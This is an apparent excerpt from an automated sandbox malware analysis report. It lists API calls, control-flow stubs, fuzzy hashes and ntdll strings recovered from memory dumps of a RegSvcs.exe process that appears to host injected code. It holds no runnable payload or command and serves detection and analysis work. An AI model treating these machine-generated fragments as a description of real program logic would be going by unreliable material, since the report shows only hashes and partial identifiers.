                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                          • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                          • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          control_flow_graph 252 41a53b-41a556 253 41a55c-41a57d NtAllocateVirtualMemory 252->253 254 41a557 call 41af60 252->254 254->253
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: b519c5b3bf3ed23989de45a446a3f1483a0321d4813e08a8efb2a01f839b3b1f
                                                          • Instruction ID: 2d8d7cd051b59848394cec9ab28889dd1b47d2bdb116ea822d79e9dc0c770f2c
                                                          • Opcode Fuzzy Hash: b519c5b3bf3ed23989de45a446a3f1483a0321d4813e08a8efb2a01f839b3b1f
                                                          • Instruction Fuzzy Hash: C8F0F8B5200108ABDB14DF99CC81EEB77A9EF8C354F158249BA0997241C634E921CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          control_flow_graph 255 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                          • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                          • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          control_flow_graph 264 41a490-41a4b9 call 41af60 NtClose
                                                          APIs
                                                          • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                          • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                          • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d32ac8019488bb5a1c47e7ad09664950109953541676ed85faf7c0f0db79a533
                                                          • Instruction ID: 6a48c740830651ba71fb3843b0dae1561d2cf6b1a46a809a983d1384fe53946f
                                                          • Opcode Fuzzy Hash: d32ac8019488bb5a1c47e7ad09664950109953541676ed85faf7c0f0db79a533
                                                          • Instruction Fuzzy Hash: 349002612024010341057158445461A900B97F0301B95C022E1014595DC63589916225
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 531ab7c12b5780a8226491c41a630b20ae502b58f9c01d90e00843883932129c
                                                          • Instruction ID: 6e8294e0003ba358d9d079b2a9be61fbc93dc8be2f088b996581729d56ed6fdc
                                                          • Opcode Fuzzy Hash: 531ab7c12b5780a8226491c41a630b20ae502b58f9c01d90e00843883932129c
                                                          • Instruction Fuzzy Hash: D090023120140902D1807158444464E500697E1301FD5C016A0025659DCB258B5977A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: fd0bb6871394e2b819ea3e36f0928584bf9ef39245a8b992cf0db66f503aafbd
                                                          • Instruction ID: 362910691115ffb64fb96a60824b5446c8f0f22d885d46670f6c01d7405f8dd4
                                                          • Opcode Fuzzy Hash: fd0bb6871394e2b819ea3e36f0928584bf9ef39245a8b992cf0db66f503aafbd
                                                          • Instruction Fuzzy Hash: BE900435311401030105F55C074450F5047D7F53513D5C033F1015555CD731CD715331
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: ed0a932982c3c1807a137a98b1119fb7e29c7d68a7edf8d322418fd59e1c6aef
                                                          • Instruction ID: 8cb5f07ae6ce43075541a31390d07ec6391466ed1a5703db5c605a0dee56ccbc
                                                          • Opcode Fuzzy Hash: ed0a932982c3c1807a137a98b1119fb7e29c7d68a7edf8d322418fd59e1c6aef
                                                          • Instruction Fuzzy Hash: AB90022921340102D1807158544860E500697E1302FD5D416A001555DCCA2589695321
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 23d36ac94e2676a61c16d3f02cf7eb79c6cbec6fc68881098d636f8180dbb925
                                                          • Instruction ID: 769963c6549876a467b31616517cc202a2fe55bb01dee99e5f8ff87fda3dc8ee
                                                          • Opcode Fuzzy Hash: 23d36ac94e2676a61c16d3f02cf7eb79c6cbec6fc68881098d636f8180dbb925
                                                          • Instruction Fuzzy Hash: 0990022130140103D1407158545860A9006E7F1301F95D012E0414559CDA2589565322
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 46fac27f0789079ceeb552311d9d7330db4c2e63c6bb8fee0db35b1868cee29b
                                                          • Instruction ID: f1e594038b7d327e30be386539b61e58b881e5fbc2d68183ef21802f0c308ccc
                                                          • Opcode Fuzzy Hash: 46fac27f0789079ceeb552311d9d7330db4c2e63c6bb8fee0db35b1868cee29b
                                                          • Instruction Fuzzy Hash: 54900221242442525545B158444450B9007A7F03417D5C013A1414955CC6369956D721
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 185688481b38bc3a8683deb16b14006ec44ed57040ceee148c35744d3a2ff1d0
                                                          • Instruction ID: 0e39e6b9294f95f18bce7c457b3e2a1cea512539961eeff31a91f9c68ce3209d
                                                          • Opcode Fuzzy Hash: 185688481b38bc3a8683deb16b14006ec44ed57040ceee148c35744d3a2ff1d0
                                                          • Instruction Fuzzy Hash: 4B90023120140513D1117158454470B500A97E0341FD5C413A042455DDD7668A52A221
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: b1c4b9ee07d9d5f4dc170aae1fe22939b28036dad3b3f75c7ccb7754df574fba
                                                          • Instruction ID: ca2950ffc6f7621a663dd4fd892a815da482a9c048f938f966eb6cd95ef0a23f
                                                          • Opcode Fuzzy Hash: b1c4b9ee07d9d5f4dc170aae1fe22939b28036dad3b3f75c7ccb7754df574fba
                                                          • Instruction Fuzzy Hash: D590023120148902D1107158844474E500697E0301F99C412A442465DDC7A589917221
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 20bb73b7a23b5a2d0208505247fa2d5663135ebd2a68498aa209479c20e5c866
                                                          • Instruction ID: a66e744e6fb02c7f4d1949d778de9463f0c4541897a4f753819d73a3b9142453
                                                          • Opcode Fuzzy Hash: 20bb73b7a23b5a2d0208505247fa2d5663135ebd2a68498aa209479c20e5c866
                                                          • Instruction Fuzzy Hash: 6490023120140502D1007598544864A500697F0301F95D012A502455AEC77589916231
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 3c8db66b05abaea61318c39763711b72be30e3faa9048f66ade891a1c09ab9da
                                                          • Instruction ID: cb1775b64bf985bcc63ee529e9431871e27ac4029ee32e2a31dfe45afe52768e
                                                          • Opcode Fuzzy Hash: 3c8db66b05abaea61318c39763711b72be30e3faa9048f66ade891a1c09ab9da
                                                          • Instruction Fuzzy Hash: E590026134140542D10071584454B0A5006D7F1301F95C016E1064559DC729CD526226
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2b25f422768ede1552d6189be4f2523bca4a0b2839a5553a4e24de699d6531cb
                                                          • Instruction ID: 9c861356ab2fdd55ef4a270fe13e8d3beda3f78dae473f981c3ab5a5e1bb64ca
                                                          • Opcode Fuzzy Hash: 2b25f422768ede1552d6189be4f2523bca4a0b2839a5553a4e24de699d6531cb
                                                          • Instruction Fuzzy Hash: 9B900221211C0142D20075684C54B0B500697E0303F95C116A0154559CCA2589615621
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 5fafedba3645dd11daa81fa7e5aef66cbccee81dde4d3766effa1e4a6d778b4f
                                                          • Instruction ID: 2d73414727c8140b43a705b0351c6ce30e5e9b7955d37095bbd15334aaf333a1
                                                          • Opcode Fuzzy Hash: 5fafedba3645dd11daa81fa7e5aef66cbccee81dde4d3766effa1e4a6d778b4f
                                                          • Instruction Fuzzy Hash: 2E90023120180502D1007158485470F500697E0302F95C012A116455ADC73589516671
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 84145c00a1989d57d6111acc3cc9501889ac743ed26a0ab0b01ac75c217b8a33
                                                          • Instruction ID: f2eed31f4c8dff219cf296b30a80327dc53c4ee3c67db612f179319cdb67722f
                                                          • Opcode Fuzzy Hash: 84145c00a1989d57d6111acc3cc9501889ac743ed26a0ab0b01ac75c217b8a33
                                                          • Instruction Fuzzy Hash: F69002216014014241407168888490A9006BBF1311795C122A0998555DC66989655765
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: c9cd22e34747e6a844e4b25c9d7454a003a121603a7b6facd35878111b69cf39
                                                          • Instruction ID: e35f9b27617b1a2c275a5acfb2c398e28e8aeda82c9260b86cccaf4b265f0d2d
                                                          • Opcode Fuzzy Hash: c9cd22e34747e6a844e4b25c9d7454a003a121603a7b6facd35878111b69cf39
                                                          • Instruction Fuzzy Hash: D490022160140602D1017158444461A500B97E0341FD5C023A102455AECB358A92A231
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 488371fdd16e3e90221b482ba5e32a07e0d6d30abf70cbeb0639671bd2c77f31
                                                          • Instruction ID: d8c970cc1a03cb9231986f108216e85dff07bc3af085c29bf4f53b4ff2de25f5
                                                          • Opcode Fuzzy Hash: 488371fdd16e3e90221b482ba5e32a07e0d6d30abf70cbeb0639671bd2c77f31
                                                          • Instruction Fuzzy Hash: C990027120140502D1407158444474A500697E0301F95C012A5064559EC7698ED56765
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                          • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                                          • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                          • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          control_flow_graph 3 41a630-41a661 call 41af60 RtlAllocateHeap
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID: 6EA
                                                          • API String ID: 1279760036-1400015478
                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                          • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                          • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          control_flow_graph 201 408308-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 210 40835c-40836e PostThreadMessageW 201->210 211 40838e-408392 201->211 212 408370-40838a call 40a480 210->212 213 40838d 210->213 212->213 213->211
                                                          APIs
                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: 6595105a47c6e32083fd1fb8fa9394886835eb68bcf65f7233021ca1186f33b0
                                                          • Instruction ID: 3ad5dae182a485ddbeb7f5a480a9d39f63c17b8903bd479f2bd62391de7c6076
                                                          • Opcode Fuzzy Hash: 6595105a47c6e32083fd1fb8fa9394886835eb68bcf65f7233021ca1186f33b0
                                                          • Instruction Fuzzy Hash: C601B531A8032976EB21A6519C42FFF772C9F40F55F04415EFE04BA1C1D6B8690547EA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          control_flow_graph 216 408310-40831f 217 408328-40835a call 41ca00 call 40acf0 call 414e50 216->217 218 408323 call 41be60 216->218 225 40835c-40836e PostThreadMessageW 217->225 226 40838e-408392 217->226 218->217 227 408370-40838a call 40a480 225->227 228 40838d 225->228 227->228 228->226
                                                          APIs
                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                          • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                                          • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                          • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          control_flow_graph 258 41a670-41a6a1 call 41af60 RtlFreeHeap
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                          • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                          • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          control_flow_graph 261 41a7d0-41a804 call 41af60 LookupPrivilegeValueW
                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                          • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                          • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          control_flow_graph 267 41a6b0-41a6dc call 41af60 ExitProcess
                                                          APIs
                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                          • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                          • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 6893ad1ff0b09ab5ded6986cc7a70d4836bc9f017eaade6908ad6907b589f490
                                                          • Instruction ID: f35058fb3e0eca0567f11708145e7cdb4a23cd3968f33c0a570972cb542fc60d
                                                          • Opcode Fuzzy Hash: 6893ad1ff0b09ab5ded6986cc7a70d4836bc9f017eaade6908ad6907b589f490
                                                          • Instruction Fuzzy Hash: 8AB09B719015C5C9DA11F7644608B1B790577E0701F55C063D3030657F4778C1D1E275
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-2160512332
                                                          • Opcode ID: c97654a23deba5ac0dc08bafadce8b5237e137477e391b2b31f26c5feca029b7
                                                          • Instruction ID: dd225e802b25b71f14174ad378245140d261fc1d8e7c0e115f6730785933b9a7
                                                          • Opcode Fuzzy Hash: c97654a23deba5ac0dc08bafadce8b5237e137477e391b2b31f26c5feca029b7
                                                          • Instruction Fuzzy Hash: 81928F71604342ABE721DF29C880FABB7E8BB94754F14491EFA94D7270D7B0E845CB62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • Thread identifier, xrefs: 014A553A
                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014A54CE
                                                          • Critical section address, xrefs: 014A5425, 014A54BC, 014A5534
                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 014A5543
                                                          • Address of the debug info found in the active list., xrefs: 014A54AE, 014A54FA
                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014A540A, 014A5496, 014A5519
                                                          • corrupted critical section, xrefs: 014A54C2
                                                          • undeleted critical section in freed memory, xrefs: 014A542B
                                                          • Critical section address., xrefs: 014A5502
                                                          • double initialized or corrupted critical section, xrefs: 014A5508
                                                          • Invalid debug info address of this critical section, xrefs: 014A54B6
                                                          • 8, xrefs: 014A52E3
                                                          • Critical section debug info address, xrefs: 014A541F, 014A552E
                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014A54E2
